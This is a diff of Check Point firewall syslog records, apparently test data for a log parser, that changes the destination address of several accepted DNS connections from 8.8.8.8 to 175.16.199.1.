 <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"93.184.220.29"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46506"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35896"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35896"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x4,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"54.70.228.208"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45452"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x3,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"11"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49166"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"12"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.81"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39708"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:15Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36b,0x4,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"13"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501035"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43798"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40880"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"93.184.220.29"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"46512"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60598"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.5"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"45142"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60645"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38909"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60645"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x2,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38909"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T16:57:16Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60516"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x3,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.81"; log_delay:"1585501036"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39716"; service:"443"; service_id:"https"; src:"192.168.2.2"]
 <134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36c,0x2,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"13.224.227.81"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Internal"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"39714"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43738"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"44020"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"59568"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x0,0xbba3afa,0xd2c10858}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56804"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x2,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"8"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40868"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x1,0x60e0fe3b,0xda019994}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"9"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58090"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T16:57:17Z gw-da58d3 CheckPoint 1930 - [action:"Accept"; conn_direction:"Internal"; flags:"4606214"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d36d,0x3,0x1cae0484,0xf99c33e9}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"10"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={BFDA4BB3-8525-054C-8EA5-6B575ED1D020};mgmt=gw-da58d3;date=1585500117;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585501037"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"51741"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
